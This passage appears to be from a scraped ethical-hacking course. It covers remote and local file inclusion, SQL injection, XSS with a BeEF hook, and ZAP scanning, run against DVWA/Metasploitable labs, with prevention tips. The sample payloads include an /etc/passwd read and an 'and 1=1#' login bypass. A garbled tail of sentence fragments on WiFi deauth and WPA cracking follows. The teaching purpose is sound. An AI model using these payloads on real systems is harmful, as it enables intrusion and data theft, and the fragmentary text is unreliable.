Now go back to the browser URL and run the
URL with /etc/passwd, you will get the data of
the target.
Copy and paste it into a text editor to read.
Remote file inclusion vulnerability:

It is a special case of file inclusion vulnerability.
In the previous module, we saw how to include
any file in the server.
If the website allows a certain function called
allow_url and allow_url_fopen, we can inject any
code from any computer to the target. We can
run payloads, and system shells and get access
to the target.
The only difference between remote and local
file inclusions is that you have to enable a
function that converts the local file to the
remote.
To enable, go to metasploitable machine and go
to php settings,
In metasploitable you have to add sudo to run

root commands.
Search for the command allow_url by clicking
ctrl+w
If these functions are ON and enabled, we can
run remote file inclusion vulnerability.
To exit the function, ctrl+xy

Now you have to restart the web server.
Go back to DVWA and run your saved file in the

URL. Remember to save the file in the same
network with real Ip to access it remotely.
The file will run on the local machine. Start

listening to connections in kali and run the file in
the remote.
Only now you will gain access to the target.
Preventing vulnerabilities:
Only allow safe files to be downloaded and
check the file types.
Before executing a file, filter its inputs.
Disable allow_url and allow_fopen in your
machine.
Section 19: SQL vulnerabilities
Most websites use a database which is used to

store data. Everything that happens on the website
is stored in the database and the web application
queries the database and displays the data to the
user. This interaction between the web application
and the database happens using a language called
SQL.
SQL vulnerabilities & their danger:

It is a very dangerous vulnerability than the other
types because it can be found anywhere. They
give you access to the database that has
sensitive data. Local files can be read even if it is
outside the root server. It can easily become the
admin and exploit the system and dangerous
files can be easily uploaded. These can be used
as both file inclusion and file upload
vulnerabilities with access to the database.
Discovering in POST:
To discover SQL injections, we should browse
through the target and try to break each page. If you
find any textbox in the form,
http://target.com/page.php?something=something
try to inject a code using “and”, ” ‘ “, and “order by” to
break the page and make it look different.
For eg., consider a login page and let the username:

user and password: 123456
To find if SQL vulnerability is present, instead of

entering the right password, enter, PW: ‘123456’and
1=1#’ anything after the # will be ignored.
In this way, the password will look like the real

password to the database. So if you can log in with
the password, itis found that SQL vulnerability is
present in the website. Now if you enter the
password with the wrong statement, For eg.,
‘123456’ and 1=2#’ you won’t be able to log in,
because it is a FALSE statement. So you can inject
anything in the password file into the website.
Bypassing Logins:
Now that we know, we can inject anything in the
password field and it will be executed on the target
system, we can bypass the login without knowing
the credentials.
With this password, if you try to log in you will be

able to log in to the page because it has the ‘or’
command, so if any one statement is right the
answer is TRUE. Bypassing depends on the code of
the website and it is up to an individual to think of
different ways to crack the code.
Discovering in GET:
Now instead of going to the login page, go to the
user info page and try to log in and it will display the
user’s details. To exploit the vulnerability, the get
method can also be used. The get method is like a
request you send to get something like the user info.
When you work on the get method, the data you

enter will be reflected in the URL, so with this URL,
you can find the vulnerability instead of the
webpage. This is applicable for pages that do not
have a textbox.
Now in the URL, next to the username, add

orderby 1 and instead of # add %23.
Hit enter and you can see the information

displayed without even entering the login details.
Reading database information:

To see how much information is selected on a
page, the orderby command should be used. In
the place of orderby 1, try giving different
numbers and see if the page runs.
If the page gives an error for a number, it means
that much data does not exist in the table, so
now decrease the number and try to find the
exact number.
After finding the number of data columns, we
can run our own statement and get it executed
on the target.
By this union command, we can see the

information in the database in the given
columns.
Whatever you inject in the place of the column
will be reflected in the output and the data will be
displayed.
Database tables:
Our target database is owasp10 and let’s try to
discover the tables in it. Run the command,
And for the given command for the table the

records will be displayed with all the tables in the
database.
Sensitive data extraction:
To read the information stored in a table from
the database, we need the column names first.
To get the columns,
The column names of the table will be displayed.
And when you need the usernames and

passwords of the accounts, modify the same
command and run it.
This way you can inject any file like a backdoor
or virus in the URL and exploit the system.
Reading & writing files on the server:

To read a file in the server, even if it is outside
the root.
To write to the server,
Now in the terminal if you run ls/tmp/ you can

see the file created and to see its contents, run
the command, cat/tmp/filename.
Data extraction using SQL map:

Instead of injecting codes manually, a tool called
SQLmap can be used to do everything
automatically.
Open Kali machine and run SQLmap
It will automatically look through all parameters

and if anything is injectable, asks for your
permission to continue.
Do the help command to know the options of the
command.
To get all the databases, add –dbs to the same
command.
To get all the tables, add –tables to the
command.
To get all the data of the table,
All the data will be displayed in a table.
Prevention of SQL vulnerabilities:

SQL injections are very dangerous and
straightforward to exploit. The best way to
prevent this is to program your web application
in a way that does not allow code to be injected
into it and executed.
Use parametrised statements in which the data
and the code are separated.
As a second line of defence you can use filters
and whitelist and blacklist commands but it is
not 100% secure.
Section 20: Cross-site scripting vulnerabilities
XSS also called cross-site scripting is a powerful

vulnerability that allows hackers to insert javascript
codes into a page and execute it. JS is a client-side
language, so when the code is executed, it will be
executed on the user when the page loads. The
webserver acts as a means when the code is
executed. It is of three main types,
1. Persistent/stored XSS
2. Reflected XSS
3. DOM-based XSS
Reflected XSS:
It is very similar to SQL, browse through the web
and try to inject into the textbox.
It is not persistent and not stored, so it only
works when the target visits a specially crafted
URL.
Go to the DVWA website and select XSS
reflected. Let’s try to inject the JS code into the
textbox.
This code gets executed. We can do the same in

the URL, so if the URL is shared with anybody
and they open it, the code will be executed on
their machine.
Stored XSS discovering:
It is similar to reflected XSS, the only difference
is for the code to run the target should actually
click on the URL.
The code will be stored in the database on the
page, so every time someone loads the page, the
code will be executed. Sono user interaction is
needed.
Go to DVWA and select XSS stored.
The alert message will run for the given code. So

from now on, whoever loads the website will get
the same alert message.
Exploiting XSS:
To exploit XSS and gain access to the target
computer, we are going to use beef.
Using the beef hook URL, we are going to inject it
into the stored XSS page, so everyone visiting
the page will be hooked to beef.
To hook victims, the default hook of beef should
be used.
Now the device opening the website will be
hooked to beef.
You can now run all the commands in the target
that we learnt in the previous sections.
Preventing XSS vulnerabilities:

These vulnerabilities happen because the data
entered by the target is displayed in the HTML,
so using JS it can be exploited.
To prevent this, minimize the usage of untrusted
input.
If a URL comes to you asking for an update, be
careful and make sure to go to the website and
check for updates.
Section 21: Automatic vulnerability discovery
Several tools are there to automatically discover

vulnerabilities, but it is always best to do manual
testing as there can be some errors and false
positives in the tool. The tool we are going to
use is zap.
Download and open zap.
To start the attack, paste the target URL in the

URL textbox.
Give it some time to scan the attacks.

Analyzing the results:
On the right you can find the alerts discovered
and the data collected from the target URL
The alerts with red flags are the high-priority
alerts.
The alerts will be ordered based on their severity

To know more about the alert, just click on it. It
displays the description of the vulnerability, how
and when it was exploited and much more
information.
The tool is very simple and powerful, experiment
with its options.
Pentest report:
It is important to make a report of all the found
vulnerabilities and bugs if you are working for a
client.
The templates and format of the report differ for
each company.
The main sections of the report are,
1. The covering section with the date and the
details of who is writing the report to whom.
2. The table of contents with page numbers.
3. The legal information(mostly will be written by
the legal team of the company)
4. Executive and engagement summary.
5. Technical findings.
6. Information disclosure.
Ways to secure websites and apps:

1. Use/write secure codes.
2. Review the code before use.
3. Get a pentest done.
4. Run a bug bounty program
Remember, nothing can give you 100% security,
these ways are to secure your system to a particular
level. Better one than zero!

Ethical Hacking-1

Uploaded by

Document Informationclick to expand document information

Copyright:

Available Formats

Ethical Hacking-1

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Ethical Hacking-1

Uploaded by

Copyright:

Available Formats

ETHICAL HACKING.

Chapter 1: Network Hacking

Hacking has become a part of our day-to-day life.

In this section, we are going to see how to test

In simpler words, hacking is being able to have

There is always a doubt in everyone’s mind, Why learn

Section 2: Hacking Lab Setup.

IInstead of setting up all different requirements, you can

Download the Kali Linux according to the configuration

Kali Linux as VM on Windows:

Kali Linux as VM on macOS:

Kali Linux as VM on Linux:

Terminal and Linux commands:

Section 4: Network Hacking

Network penetration testing:

1. Pre-connection attacks: Here you will learn about all

For eg., if you connect your computer to the internet

Connecting a wireless adapter to Kali:

To change the value of the MAC address, the

After changing the options of the interface, the

Now to enable monitor mode, use the command,

Also, note that not all adapters support monitor

Section 5: Network Hacking-pre connection attacks

Go to the Kali virtual machine and enable the

It will start working and discovering all the

Wifi bands- 2.4Ghz and 5Ghz frequencies:

You can also multiply specific bands using the band

To do airodump like this, you need a power adapter

Packet sniffing targetted network:

This is the list of the client devices that are connected

By ending this, new files in your current working

But here the packets are encrypted, because the

In the number of deauth packets, give a really long

This command will disconnect the target device from

In the previous sections, everything can be done

WEP Encryption cracking:

Weaknesses of WEP algorithm implementation:

The key is found from the IV. Now, we can

Now, we break the encryption and are connected to

0: to do this process only once

4. Replace the - in the address with : and run the

5. Now we are associated with the target network and

Use the command,

Before running the aircrack-ng associate with the

After running, the command finds the key. The

Here, you will learn about cracking WPA and WPA2

Before knowing to know how to crack the network, it

It allows the devices to connect to the network

This command will list the networks.

Run airodump-ng for all the networks around.

The airodump-ng starts running, now wait until

Crunch [min] [max] [characters] -t [pattern] -o

Crunch: name of the tool

You can learn more options of crunch with the

The MIC of the handshake packet is separated

Aircrack-ng runs the wordlist with the handshake

The speed of this process depends on the

To secure your network from hackers,